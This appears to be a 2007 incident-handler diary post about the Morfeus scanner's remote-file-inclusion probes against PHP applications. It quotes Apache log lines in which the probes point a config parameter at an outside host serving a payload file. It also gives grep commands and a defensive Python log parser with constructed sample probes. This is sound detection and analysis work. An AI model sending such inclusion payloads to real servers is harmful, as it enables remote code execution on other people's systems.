So, I assume by now you all know it is the "Month of the PHP bugs" but besides the tons of PHP advisories what else have we been seeing?
Well, today fellow handler Jim Clausing started an interesting thread posting his Apache logs which contained lines upon lines of:
220.127.116.11 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://18.104.22.168/~lisir/M.txt?&/ HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"
22.214.171.124 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://126.96.36.199/~lisir/M.txt?&/ HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"
So, curious about Morfeus (which, incidentally, is an old tool) hitting my own systems, I went off to check my own logs:
tempest:~$ grep php www-access.log | grep Morfeus | cut -f 1 -d' ' | sort -n | uniq
tempest:~$ grep php www-access.log | grep Morfeus | wc -l
Aside from the different host scanning, it is pretty clear that Morfeus has been on my boxes too.
First observation: Morfeus doesn't care about what you might have set your Apache ServerTokens to (which is still a good trick against Netcraft abusers but not against script kiddies). Mine are set to give nothing away (and no, PHP is not installed) but they still scanned me.
Second observation: this is such a "noisy" scan that Jim said that he had turned off the Bleeding Edge Snort signatures and therefore only caught it when he got an alert from OSSEC (an open-source HIDS). It is never good news when signatures are turned off because they are too noisy but, at least in this case, I think we can safely assume that Jim noticed the scans the first time round.
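As an added example (not part of the original diary, and not Jim's or my own tooling), here is the same log check as a small parser rather than a grep pipeline: it reads Apache combined-format lines, counts Morfeus hits and their source addresses per probed script, and, because a scanner can change its User-Agent string at will, also flags any request whose query parameter carries an absolute URL, which is the remote-file-inclusion shape of these probes. The sample lines and addresses are constructed (documentation ranges), modelled on the entries above.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format. The request URL is matched as \S+ because
# these probes contain no spaces (they end in "?&/").
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample in the shape of the diary's entries (documentation IPs).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.0.113.5/~lisir/M.txt?&/ HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"
192.0.2.10 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://203.0.113.5/~lisir/M.txt?&/ HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"
198.51.100.7 - - [21/Mar/2007:03:01:12 -0400] "GET /index.php?page=http://203.0.113.9/x.txt? HTTP/1.1" 404 1042 "-" "Mozilla/4.0"
198.51.100.8 - - [21/Mar/2007:03:02:00 -0400] "GET /about.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def rfi_params(url):
    """Query parameters whose value is an absolute http(s) URL: the shape of
    a remote-file-inclusion probe, whatever User-Agent the scanner sends."""
    return [(k, v) for k, v in parse_qsl(urlsplit(url).query)
            if v.lower().startswith(("http://", "https://"))]

def summarize(log_text):
    """Count probe sources and targeted scripts and collect payload hosts.
    A line counts if it carries an RFI-shaped parameter or the Morfeus UA."""
    report = {"morfeus_hits": 0, "sources": Counter(), "targets": Counter(),
              "payload_hosts": set()}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rfi = rfi_params(rec["url"])
        morfeus = "Morfeus" in rec["ua"]
        if not (rfi or morfeus):
            continue
        report["morfeus_hits"] += int(morfeus)
        report["sources"][rec["ip"]] += 1
        report["targets"][urlsplit(rec["url"]).path] += 1
        report["payload_hosts"].update(urlsplit(v).hostname for _, v in rfi)
    return report
```

Run `summarize(open("www-access.log").read())` against a real access log; the third sample line shows why the UA-only grep is not enough, since the probe is caught by its parameter shape alone.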
Third observation: if you are running a site with PHP this is not an enjoyable month...
Mar 21st 2007